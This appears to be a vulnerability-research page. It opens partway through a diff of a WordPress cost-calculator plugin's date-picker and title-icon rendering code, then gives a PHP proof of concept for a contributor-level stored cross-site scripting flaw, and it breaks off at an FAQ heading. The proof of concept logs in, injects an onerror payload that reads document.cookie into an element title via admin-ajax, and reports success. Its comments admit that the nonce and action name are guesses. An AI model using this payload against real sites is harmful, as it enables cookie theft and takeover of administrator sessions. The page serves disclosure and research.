+						value="<?php echo esc_attr( $scc_date_config['min_date'] ); ?>" <?php echo esc_attr( $scc_date_config['min_date'] === 'today' ? 'data-today-enabled=true' : '' ); ?>>
+					</div>
+					<div class="col-md-4" style="margin-bottom: 1rem">
+						<label class="use-tooltip fw-bold" title="Select the maximum date in which it is allowed to choose dates"
+						style="font-size:14px; transform:scale(0.8)">Max date </label>
+						<input placeholder="yyyy-mm-dd" type="text" data-date-structure data-picker-field="max-date" class="input_pad inputoption_2 scc-datepicker-editor"
+						style="text-align:center;height:35px; min-width:158px;" placeholder=""
+						value="<?php echo esc_attr( $scc_date_config['max_date'] ); ?>" <?php echo esc_attr( $scc_date_config['max_date'] === 'today' ? 'data-today-enabled=true' : '' ); ?>>
+					</div>
+					<div class="col-md-4" style="margin-bottom: 1rem">
+					<label class="use-tooltip fw-bold" title="Choose the default date for the date picker"
+						style="font-size:14px; transform:scale(0.8)">Default date </label>
+						<input placeholder="yyyy-mm-dd" type="text" data-picker-field="default-date" class="input_pad inputoption_2 scc-datepicker-editor"
+						style="text-align:center;height:35px; min-width:158px;" placeholder=""
+						value="<?php echo esc_attr( $el->value2 ); ?>" <?php echo esc_attr( $el->value2 === 'today' ? 'data-today-enabled=true' : '' ); ?>>
+					</div>
+
+				</div>
+				<div class="row gx-2 scc-edit-input-option-wrapper">
+					<div class="col-md-12" style="margin-bottom: 1rem">
+						<label class=" use-tooltip fw-bold" title="Manually choose the dates you want to disable so users can't select them"
+						style="font-size:14px; transform:scale(0.8)">Disabled dates </label>
+						<input placeholder="yyyy-mm-dd" type="text" data-picker-field="disabled-date" class="input_pad inputoption_2 scc-datepicker-editor"
+						style="text-align:center;height:35px; min-width:158px;" placeholder=""
+						value="<?php echo esc_attr( $scc_date_config['disabled_date'] ); ?>">
+					</div>
+				</div>
+			</div>
+			<hr>
+			<p>
+					<label class="scc-accordion_switch_button">
+						<input
+							data-element-id="<?php echo intval( $el->id ); ?>"
+							<?php echo $show_time_options ? 'checked' : ''; ?>
+							data-value6-key="enable_time_picker"
+							type="checkbox">
+						<span class="scc-accordion_toggle_button round"></span>
+					</label>
+					<span class="scc-adv-opt-lbl"
+						data-bs-original-title="">Enable Time Picker
+						<i
+							data-element-tooltip-type="enable-time-picker-tt"
+							class="material-icons-outlined more-settings-info"
+							style="margin-right:5px">
+							<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+						</i>
+					</span>
+				</p>
+				<p class="limit-hours <?php echo $show_time_options ? '' : 'd-none'; ?>">
+					<label class="scc-accordion_switch_button">
+						<input
+							data-element-id="<?php echo intval( $el->id ); ?>"
+							<?php echo boolval( $scc_date_config['limit_hours'] ) ? 'checked' : ''; ?>
+							data-value6-key="limit_hours"
+							type="checkbox">
+						<span class="scc-accordion_toggle_button round"></span>
+					</label>
+					<span class="scc-adv-opt-lbl"
+						data-bs-original-title="">Limit Hours
+						<i
+							class="material-icons-outlined more-settings-info"
+							data-element-tooltip-type="limit-hours-tt"
+							style="margin-right:5px">
+							<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+						</i>
+					</span>
+				</p>
+				<div class="hours-wrapper-12 start <?php echo $show_12h_options ? '' : 'd-none'; ?> ">
+					<div class="row gx-2 scc-edit-input-option-wrapper hours-select">
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold" style="font-size:14px; transform:scale(0.8)" title="Select the minimum time in which it is allowed to choose from">Start time</label>
+							<select data-value6-key="limit_hours_start_12h_hour">
+								<?php foreach ( $hours_12 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_start_12h_hour'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold fade" style="font-size:14px; transform:scale(0.8)">1</label>
+							<select data-value6-key="limit_hours_start_12h_minutes">
+								<?php foreach ( $numbers_0_to_55 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_start_12h_minutes'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold fade" style="font-size:14px; transform:scale(0.8)">1</label>
+							<select data-value6-key="limit_hours_start_am_pm">
+								<option <?php selected( $scc_date_config['limit_hours_start_am_pm'], 'AM' ); ?> value="AM">AM</option>
+								<option <?php selected( $scc_date_config['limit_hours_start_am_pm'], 'PM' ); ?> value="PM">PM</option>
+							</select>
+						</div>
+					</div>
+				</div>
+				<div class="hours-wrapper-12 end <?php echo $show_12h_options ? '' : 'd-none'; ?>">
+					<div class="row gx-2 scc-edit-input-option-wrapper hours-select">
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold" style="font-size:14px; transform:scale(0.8)" title="Select the minimum time in which it is allowed to choose from">End time</label>
+							<select data-value6-key="limit_hours_end_12h_hour">
+								<?php foreach ( $hours_12 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_end_12h_hour'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold fade" style="font-size:14px; transform:scale(0.8)">1</label>
+							<select data-value6-key="limit_hours_end_12h_minutes">
+								<?php foreach ( $numbers_0_to_55 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_end_12h_minutes'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold fade" style="font-size:14px; transform:scale(0.8)">1</label>
+							<select data-value6-key="limit_hours_end_am_pm">
+								<option <?php selected( $scc_date_config['limit_hours_end_am_pm'], 'AM' ); ?> value="AM">AM</option>
+								<option <?php selected( $scc_date_config['limit_hours_end_am_pm'], 'PM' ); ?> value="PM">PM</option>
+							</select>
+						</div>
+					</div>
+				</div>
+				<div class="hours-wrapper-24 start <?php echo $show_24h_options ? '' : 'd-none'; ?>">
+					<div class="row gx-2 scc-edit-input-option-wrapper hours-select">
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold" style="font-size:14px; transform:scale(0.8)" title="Select the minimum time in which it is allowed to choose from">Start time</label>
+							<select data-value6-key="limit_hours_start_24h_hour">
+								<?php foreach ( $hours_24 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_start_24h_hour'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold fade" style="font-size:14px; transform:scale(0.8)">1</label>
+							<select data-value6-key="limit_hours_start_24h_minutes">
+								<?php foreach ( $numbers_0_to_55 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_start_24h_minutes'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+					</div>
+				</div>
+				<div class="hours-wrapper-24 end <?php echo $show_24h_options ? '' : 'd-none'; ?>">
+					<div class="row gx-2 scc-edit-input-option-wrapper hours-select">
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold" style="font-size:14px; transform:scale(0.8)" title="Select the minimum time in which it is allowed to choose from">End time</label>
+							<select data-value6-key="limit_hours_end_24h_hour">
+								<?php foreach ( $hours_24 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_end_24h_hour'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+						<div class="col-md-4">
+							<label class="use-tooltip fw-bold fade" style="font-size:14px; transform:scale(0.8)">1</label>
+							<select data-value6-key="limit_hours_end_24h_minutes">
+								<?php foreach ( $numbers_0_to_55 as $value ) { ?>
+									<option <?php selected( $scc_date_config['limit_hours_end_24h_minutes'], $value ); ?>><?php echo $value; ?></option>
+								<?php } ?>
+							</select>
+						</div>
+					</div>
+				</div>
+				<div class="row gx-2 scc-edit-input-option-wrapper scc-datepicker-time-interval <?php echo $show_time_options ? '' : 'd-none'; ?>">
+					<div class="col-md-6">
+						<label class=" use-tooltip fw-bold"
+						style="font-size:14px; transform:scale(0.8)">Time Interval</label>
+						<select class="d-block" data-value6-key="time_interval">
+							<option <?php selected( $scc_date_config['time_interval'], '15m' ); ?> value="15m">15 minutes</option>
+							<option <?php selected( $scc_date_config['time_interval'], '30m' ); ?> value="30m">30 minutes</option>
+							<option <?php selected( $scc_date_config['time_interval'], '60m' ); ?> value="60m">1 hour</option>
+						</select>
+					</div>
+					<div class="col-md-6">
+						<label class=" use-tooltip fw-bold"
+						style="font-size:14px; transform:scale(0.8)">Time Format</label>
+						<div class="d-block">
+							<div class="btn-group scc-btn-group-rounded" data-value6-key="time_format">
+								<div role="button" class="m-0 btn <?php echo $scc_date_config['time_format'] === '12h' ? 'scc-btn-brand active' : ''; ?>" data-value="12h">12H</div>
+								<div role="button" class="m-0 btn <?php echo $scc_date_config['time_format'] === '24h' ? 'scc-btn-brand active' : ''; ?>" data-value="24h">24H</div>
+							</div>
+						</div>
+					</div>
+				</div>
+				<hr>
+			<?php
+            }
+
+
+                if ( $el->type != 'checkbox'  ) {
                     ?>
 					<div class="text-scc-col d-flex" style="font-size:13px;">
 						<div class="col-md-12 input-field use-premium-tooltip">
@@ -282,9 +594,14 @@
 					<?php
                 }
         ?>
-				<?php if ( $el->type !== 'texthtml' ) { ?>
+				<?php if ( $el->type !== 'texthtml'  ) { ?>
 				<div class="scc-accordion-tooltip px-0" style="width: 100%; text-align:left;"><span style="text-align: left;display: block;font-size:16px;margin-bottom:10px;">Responsive Options
-				<i class="material-icons-outlined with-tooltip" data-element-tooltip-type="responsive-options-tt" data-bs-original-title="" title="" style="margin-right:5px">help_outline</i>
+			    <i
+					data-element-tooltip-type="responsive-options-tt"
+					class="material-icons-outlined more-settings-info"
+					style="margin-right:5px">
+					<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+				</i>
 				</span>
 					<div class="row gx-2 mt-2">
 						<div class="col-md-6 input-field use-premium-tooltip">
@@ -327,7 +644,10 @@
 						</select>
 					</div>
 				</div>
-				<?php } ?>
+				<?php }
+
+			?>
+
 			</div>
 		</div>
 		<?php
@@ -1516,6 +1836,419 @@

         return $html;
     }
+	public function get_element_type_v2( $type ) {
+        return SCC_ELEMENT_TYPES[ $type ];
+    }
+	public function renderDate( $el, $conditionsBySet ) {
+        $defaults = [
+            'orden'                         => '0',
+            'titleElement'                  => 'Title',
+            'type'                          => 'date',
+            'value1'                        => 'single_date',
+            'value2'                        => '',
+            'value3'                        => '',
+            'value4'                        => '',
+            'value5'                        => '1',
+            'length'                        => '12asd',
+            'uniqueId'                      => '',
+            'mandatory'                     => '0',
+            'showTitlePdf'                  => '0',
+            'titleColumnDesktop'            => '4',
+            'titleColumnMobile'             => '12',
+            'showPriceHint'                 => '0',
+            'displayFrontend'               => '0',
+            'displayDetailList'             => '0',
+            'showInputBoxSlider'            => '0',
+            'showSavingsSlider'             => '0',
+            'subsection_id'                 => '0',
+            'element_woocomerce_product_id' => null,
+            'tooltiptext'                   => null,
+            'conditions'                    => [],
+            'elementitems'                  => [],
+        ];
+        $el              = (object) meks_wp_parse_args( $el, $defaults );
+
+        if ( !isset( $el->type_v2 ) ) {
+            $el->type_v2 = $this->get_element_type_v2( $el->type );
+        }
+        $value6_default  = DF_SCC_ELEMENT_DEFAULT_VALUES[$el->type_v2]['advanced']['value6'];
+        $scc_date_config = wp_parse_args(
+            json_decode( wp_unslash( !empty( $el->value6 ) ? $el->value6 : '' ), true ),
+            $value6_default
+        );
+        ob_start();
+        ?>
+	<div class="scc-element-content" data-element-setup-type="date" value="selectoption" style="
+		<?php
+        if ( ! $this->is_from_ajax ) {
+            echo 'display:none;';
+        }
+		?>
+		 height:auto;">
+		<div class="slider-setup-body date-setup-body" style="border:0px none!">
+			<!-- CONTENIDO DE CADA ELEMENTO -->
+			<!-- ELEMENT -->
+			<label class="form-label fw-bold">Title</label>
+			<?php
+				echo $this->renderElementTitle( $el ); ?>
+			<div class="col-12 mb-3 edit-field" style=" width: 100%;">
+				<div class="col scc-input-icon col-md-4 scc-pm-0">
+					<label class="form-label fw-bold">Date Type</label> <i style="margin-top:-10px;" class="material-icons-outlined v-align-middle" data-element-tooltip-type="date-picker-types-tt">
+					 <span
+							class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</i>
+					<select data-date-structure class="form-select w-100" onchange="changeValue1(this)">
+						<option value="single_date" <?php selected( $el->value1, 'single_date' ); ?>>Single Date Picker</option>
+						<option value="date_range" <?php selected( $el->value1, 'date_range' ); ?>>Date Range</option>
+					</select>
+				</div>
+			</div>
+			<div class="col-12 mb-3 pricing-mode-dd edit-field <?php echo ( $el->value1 !== 'date_range' ) ? 'scc-d-none' : ''; ?>" style=" width: 100%;">
+				<div class="col scc-input-icon col-md-4 scc-pm-0">
+					<label class="form-label fw-bold">Pricing Mode</label> <i style="margin-top:-10px;" class="material-icons-outlined v-align-middle" data-element-tooltip-type="date-picker-pricing-mode-tt">
+						<span
+							class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</i>
+					<?php
+                    $scc_date_range_pricing_structure = isset( $scc_date_config['date_range_pricing_structure'] ) && !empty( $scc_date_config['date_range_pricing_structure'] )
+                        ? $scc_date_config['date_range_pricing_structure']
+                        : 'unit_price_only';
+        ?>
+					<input data-date-structure class="form-select w-100 pricing-structure-dd scc-datepicker-config" value="<?php echo esc_attr( $scc_date_range_pricing_structure ); ?>" onchange="changeValue6(this)">
+				</div>
+			</div>
+
+			<!--WooCommerce-->
+			<?php if ( isset( $this->woo_commerce_products ) ) { ?>
+			<div class="row mb-3 edit-field">
+				<div class="text-scc-col d-flex">
+					<div class="col-md-12" style="margin-top:10px;padding:0px;">
+						<div class="scc-col-xs-12 scc-col-md-12" style="padding:0px;background: #f8f9ff;height: 35px;">
+							<img class="scc-woo-logo"
+								src="<?php echo esc_url_raw( SCC_ASSETS_URL . '/images/logo-woocommerce.svg' ); ?>"
+								title="Pick an item from your WooCommerce products to link to.">
+							<i style="margin-top:-10px;" class="material-icons-outlined v-align-middle" data-element-tooltip-type="woocommerce-attach-product">
+							<span
+								class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+							</i>
+						</div>
+						<div class="woo-product-dd scc-col-xs-12 scc-col-md-12" style="padding:0px;">
+							<select class="scc_woo_commerce_product_id scc-woo-commerce-product-selector"
+								data-selected-value=<?php echo intval( $el->element_woocomerce_product_id ); ?>
+								data-target="elements_added"
+								onchange="attachProductId(this, <?php echo intval( $el->id ); ?>, '<?php echo esc_attr( $el->type ); ?>')">
+								<option style="font-size: 10px" value=0>Select a product..</option>
+								<?php echo $this->render_woocommerce_product_options( $el->element_woocomerce_product_id ); ?>
+							</select>
+						</div>
+					</div>
+				</div>
+			</div>
+			<?php } ?>
+
+			<div class="mb-3 edit-field scc-price-per-date scc-pm-0 <?php echo ( $el->value1 == 'date_range' && $scc_date_config['date_range_pricing_structure'] !== 'quantity_mod' ) ? '' : 'scc-d-none'; ?>">
+				<div class="col scc-input-icon col-md-4 scc-pm-0">
+					<label class="form-label fw-bold" style="width: 100%;">Cost (per day)</label>
+					<div class="scc-flex-inline">
+						<span class="input-group-text"
+							style="float: left;"><?php echo df_scc_get_currency_symbol_by_currency_code( $this->df_scc_form_currency ); ?></span>
+						<input onkeyup="changeValue4(this)" onchange="changeValue4(this),checkBannerNoticeWithDebounce( true )" type="number"
+							class="input_pad check-zero-amount-input inputoption_2" data-currency-input=1 style="text-align:center;width:92% !important;height:35px;margin-right:0 !important"
+							placeholder="Price" value="<?php echo esc_attr( $el->value4 ); ?>" style="margin: 0;">
+					</div>
+				</div>
+			</div>
+
+		</div>
+		<div class="scc-element-content" value="selectoption" style="<?php
+        if ( ! $this->is_from_ajax ) {
+            echo 'display:none;';
+        }
+        ?> height:auto">
+			<div class="scc-new-accordion-container">
+				<div class="styled-accordion">
+					<div class="scc-title scc_accordion_advance" onclick="showAdvanceDateoptions(this)">
+						<i class="material-icons">
+							<span
+								class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['chevron-right'] ); ?></span>
+						</i>
+						<span>Advanced Options</span>
+					</div>
+					<?php echo $this->renderAdvancedOptions( $el ); ?>
+				</div>
+                <div class="styled-accordion">
+					<div class="scc-title scc_accordion_conditional ">
+							<i class="material-icons">keyboard_arrow_right</i>
+							<span style="padding-right:20px;" data-element-tooltip-type="conditional-logic-tt" data-bs-original-title="" title="">Conditional Logic </span>
+					</div>
+				</div>
+			</div>
+		</div>
+		<!-- ADVANCE -->
+		<?php // echo $this->scc_render_element_saving( $el ); ?>
+	</div>
+	<?php
+        $html = ob_get_clean();
+
+        return $html;
+    }
+
+	//this function render the element title input
+    public function renderElementTitle( $el ) {
+        ob_start();
+        ?>
+		<div class="input-group d-inline-flex scc-input-icon scc-title-icon mb-3">
+			<?php echo $this->renderTitleIconButton( $el, 'element' ); ?>
+			<input type="text"
+				   name="scc-element-title-field"
+				   class="scc-element-title-field"
+			       onkeyup="clickedTitleElement(this)"
+				   placeholder="Title"
+				   value="<?php echo stripslashes( htmlentities( $el->titleElement ) ); ?>"
+			>
+		</div>
+		<?php
+        $html = ob_get_clean();
+
+        return $html;
+    }
+
+	//render title icon function. el is the element object and elementType can be 'element' or 'element-item'
+    public function renderTitleIconButton( $el, $elementType ) {
+		$sccIconConfig = wp_parse_args(
+            json_decode( wp_unslash( !empty( $el->titleIconConfigArray ) ? $el->titleIconConfigArray : '' ), true ),
+            [
+                'type'       => 'icon-font',
+                'icon_html'	 => '',
+                'icon_class' => 'material-icons',
+                'icon_text'	 => 'wallpaper',
+                'image_icon' => '',
+                'position'   => '',
+                'width'      => '',
+            ]
+        );
+        ob_start();
+		?>
+		<div class="scc-icon-picker" data-type="<?php echo esc_attr( $sccIconConfig['type'] ); ?>" data-position="<?php echo esc_attr( $sccIconConfig['position'] ); ?>" data-width="<?php echo esc_attr( $sccIconConfig['width'] ); ?>">
+			<input type="hidden" name="icon" value="">
+			<button onclick="sccShowTitleIconOptions(this, '<?php echo esc_attr( $elementType ); ?>')" class="input-group-text scc-icon-picker-button" style="height: 45px;border-radius: 6px 0px 0px 6px">
+				<?php if ( $sccIconConfig['type'] === 'img' && !empty( $sccIconConfig['image_icon'] ) ) { ?>
+				<img class="scc-selected-icon scc-image-icon" src="<?php echo $sccIconConfig['image_icon']; ?>" style="width:22px" alt="">
+				<span class="scc-selected-icon  scc-font-icon" style="display:none;">
+					<i class="<?php echo esc_attr( $sccIconConfig['icon_class'] ); ?>" ><?php echo esc_attr( $sccIconConfig['icon_text'] ); ?></i>
+				</span>
+				<?php } else { ?>
+				<img class="scc-selected-icon scc-image-icon" src="" style="width:22px; display:none" alt="">
+				<span class="scc-selected-icon  scc-font-icon">
+					<i class="<?php echo esc_attr( $sccIconConfig['icon_class'] ); ?>" ><?php echo esc_attr( $sccIconConfig['icon_text'] ); ?></i>
+				</span>
+				<?php } ?>
+			</button>
+
+			<div class="scc-icon-picker-menu">
+				<div class="scc-icon-picker-search">
+					<input class="scc-search-input" type="text" placeholder="Search icons...">
+					<button class="btn" style="float:right;width:10%;box-shadow: none;" onclick="removeElementTitleIcon(this, '<?php echo esc_attr( $elementType ); ?>')">
+						<span class="scc-icn-wrapper" style="margin-right:4px;"><i class="material-icons-outlined scc-conditional-delete-button">delete</i></span>
+					</button>
+				</div>
+
+				<div class="scc-icon-picker-filters">
+					<button class="scc-icon-picker-filter active" data-filter="scc-fontawesome">Font Awesome</button>
+					<button class="scc-icon-picker-filter" data-filter="scc-material-icon">Material Icons</button>
+					<button class="scc-icon-picker-filter show-all" data-filter="scc-all">Show all</button>
+					<button id="scc-upload-el-<?php echo $el->id; ?>" data-element-id="<?php echo $el->id; ?>" onclick="uploadElementTitleIcon(this,'<?php echo esc_attr( $elementType ); ?>')" class="scc-icon-picker-upload-button d-inline-flex align-items-center" style="border-radius:6px">
+								<span class="scc-icn-wrapper" style="margin-right:4px;"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['upload-cloud'] ); ?></span>
+							 Upload </button>
+					<button style="background:white; border:none;">
+						<i class="material-icons-outlined v-align-middle" data-element-tooltip-type="upload-icon-tt">
+						<span class="scc-icn-wrapper"><?php echo scc_get_kses_extended_ruleset( $this->scc_icons['help-circle'] ); ?></span>
+					</button>
+
+				</i>
+				</div>
+				<ul class="scc-icon-list">
+
+				</ul>
+				<div class="text-center">
+					<span class="scc-loading-msg" style="display:none; padding-top:5px;">
+						<i class="scc-btn-spinner scc-save-btn-spinner"></i> Loading...
+					</span>
+				</div>
+			</div>
+		</div>
+		<?php
+        $html = ob_get_clean();
+
+        return $html;
+    }
+
+	public function renderConditionalLogic( $el, $conditionsBySet ) {
+		ob_start();
+        ?>
+		<div class="scc-content" style="display: none;">
+		<div class="scc-transition scc-hidden">
+			<?php
+                                                    foreach ( $conditionsBySet as $key => $conditionCollection ) {
+                                                        ?>
+			<?php if ( $key > 1 ) { ?>
+			<div class="scc-or-label-cond">OR</div>
+			<?php } ?>
+			<div class="condition-container clearfix" data-condition-set=<?php echo intval( $key ); ?>>
+				<?php
+                                                            foreach ( $conditionCollection as $index => $condition ) {
+                                                                $is_checkbox_condition         = $condition->elementitem_id && ! $condition->condition_element_id;
+                                                                $is_checkbox_with_qtn_selector = $is_checkbox_condition && !in_array( $condition->op, [ 'chec', 'unc' ] );
+                                                                $comparisons                   = (
+                                                                    (
+                                                                        $condition->op === 'eq' ||
+                                                                        $condition->op === 'ne' ||
+                                                                        $condition->op === 'any'
+                                                                    ) &&
+                                                                    ( isset( $condition->element_condition ) ) &&
+                                                                    ! (
+                                                                        $condition->element_condition->type === 'slider' ||
+                                                                        $condition->element_condition->type === 'distance' ||
+                                                                        $condition->element_condition->type === 'quantity box' ||
+                                                                        $condition->element_condition->type === 'calctotal' ||
+                                                                        $condition->element_condition->type === 'date'
+                                                                    )
+                                                                );
+
+                                                                if ( $comparisons ) {
+                                                                    echo $this->get_conditional_logic_second_step( $condition, $index );
+                                                                }
+                                                                ?>
+
+				<?php
+
+                                                                if ( $is_checkbox_with_qtn_selector ) {
+                                                                    echo $this->get_conditional_logic_second_step( $condition, $index );
+                                                                }
+                                                                ?>
+
+																<?php
+
+                                                                if ( $is_checkbox_condition && ! $is_checkbox_with_qtn_selector ) {
+                                                                    echo $this->get_conditional_logic_second_step( $condition, $index );
+                                                                }
+                                                                ?>
+
+				<?php
+
+                                                                if ( $condition->condition_element_id || isset( $condition->is_total_cond ) && $condition->is_total_cond ) {
+                                                                    if ( in_array( $condition->element_condition->type, [ 'slider', 'quantity box', 'date', 'distance', 'calctotal' ] ) ) {
+                                                                        ?>
+																		<!-- Cond 1 -->
+				<div class="row col-xs-12 col-md-12 conditional-selection"
+					style="padding: 0px; margin-bottom: 5px;">
+					<input type="text" class="id_conditional_item"
+						value="<?php echo intval( $condition->id ); ?>" hidden>
+					<div class="col-xs-2 col-md-2" style="padding:0px;background: #DCF1FD;max-width:70px">
+						<span class="scc_label"
+							style="text-align:center;padding-right:10px;padding-left:5px;margin-top:5px;"><?php echo $index >= 1 ? 'And' : 'Show if'; ?></span>
+					</div>
+					<div class="col-xs-10 col-md-10" style="padding:0px;">
+						<div class="conditional-selection-steps col-xs-12 col-md-12"
+							style="padding:0px;">
+							<div class="item_conditionals" data-value='{"cond":"<?php echo esc_attr( $condition->id ); ?>","operator": "<?php echo esc_attr( $condition->op ); ?>","itemId":"<?php echo intval( $condition->elementitem_id ); ?>", "value": "<?php echo esc_attr( $condition->value ); ?>"}'>
+								<input type="hidden" value="<?php echo intval( ( $condition->condition_element_id === null ) ? $condition->elementitem_id : $condition->condition_element_id  ); ?>" class="first-conditional-step scc-ts-search">
+								<input type="hidden" value="<?php echo esc_attr( $condition->op ); ?>" class="second-conditional-step">
+								<input type="hidden" value="<?php echo intval( $condition->elementitem_id ); ?>" class="third-conditional-step">
+
+								<?php
+                                $scc_is_date_type                                               = $condition->element_condition->type == 'date';
+                                                                        $scc_condition_operator = 'quantity';
+
+                                                                        /* if( $condition->op == 'eq' || $condition->op == 'ne' || $condition->op == 'any' ){
+                                                                            $scc_condition_operator = 'quantity';
+                                                                        }elseif */
+                                                                        $scc_number_class = $scc_is_date_type ? 'conditional-number-value scc-d-none' : 'conditional-number-value';
+                                                                        $scc_date_class   = $scc_is_date_type ? 'scc-conditional-date-value' : 'scc-conditional-date-value scc-d-none';
+                                                                        $scc_date_value   = $this->scc_is_valid_date( $condition->value ) ? $condition->value : '';
+                                                                        ?>
+								<input value="<?php echo esc_attr( $condition->value ); ?>" type="number" placeholder="Number" class="<?php echo $scc_number_class; ?>" min="0">
+								<input value="<?php echo esc_attr( $scc_date_value ); ?>" type="date" class="<?php echo $scc_date_class; ?>">
+
+								<div class="btn-group scc-cond-btn-group" style="margin-left: 10px;">
+									<button onclick="addConditionElement(this)"
+										class="btn btn-cond-saved">Saved</button>
+									<button onclick="deleteCondition(this)"
+										class="btn btn-transparent"><i class="material-icons-outlined scc-conditional-delete-button">delete</i></button>
+								</div>
+							</div>
+						</div>
+					</div>
+				</div>
+				<?php
+                                                                    }
+                                                                }
+                                                            }
+                                                        ?>
+				<div class="row col-xs-12 col-md-12 conditional-selection
+															<?php
+                                                        if ( count( $conditionCollection ) ) {
+                                                            echo 'hidden';
+                                                        }
+                                                        ?>
+															" style="padding: 0px; margin-bottom: 5px;">
+					<div class="col-xs-2 col-md-2" style="padding:0px;background: #DCF1FD;max-width:70px;">
+						<span class="scc_label"
+							style="text-align:center;padding-right:10px;padding-left:5px;margin-top:5px;"><?php echo empty( count( $el->conditions ) ) ? 'Show if' : 'And'; ?></span>
+					</div>
+					<div class="col-xs-10 col-md-10" style="padding:0px;">
+						<div class="conditional-selection-steps col-xs-12 col-md-12"
+							style="padding:0px;">
+							<div class="item_conditionals">
+								<input type="hidden" class="first-conditional-step scc-ts-search">
+								<input type="hidden" class="second-conditional-step">
+								<input typ

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24630 - Stylish Cost Calculator <= 8.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting

<?php
/**
 * Proof of Concept for CVE-2026-24630
 * Requires contributor-level WordPress credentials
 * Injects XSS payload into calculator element title
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// XSS payload to execute when admin views the calculator editor
$payload = '"><img src=x onerror=alert(document.cookie)>';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);

// Verify login success by checking for admin bar or dashboard
if (strpos($response, 'wp-admin-bar') === false) {
    die('Login failed. Check credentials.');
}

// First, create or get a calculator form ID
// This step may require navigating to the calculator creation interface
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin.php?page=stylish_cost_calculator');
$response = curl_exec($ch);

// Extract nonce and form ID from the page (simplified example)
// In real exploitation, you would parse the HTML for these values
preg_match('/id_form" value="(d+)"/', $response, $form_matches);
$form_id = $form_matches[1] ?? 1;

// Now inject XSS via the element creation endpoint
// The vulnerable endpoint is typically accessed via AJAX or form submission
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'action' => 'scc_save_element',  // This action name may vary
    'titleElement' => 'Legitimate Title ' . $payload,
    'type' => 'text',
    'subsection_id' => $form_id,
    'nonce' => 'extracted_nonce_here'  // Would need to extract from page
]));

$response = curl_exec($ch);

if (strpos($response, 'success') !== false) {
    echo "XSS payload injected successfully.n";
    echo "Payload will execute when admin views calculator ID: $form_idn";
} else {
    echo "Injection failed. Response: $responsen";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-24630?
Overview of the vulnerability
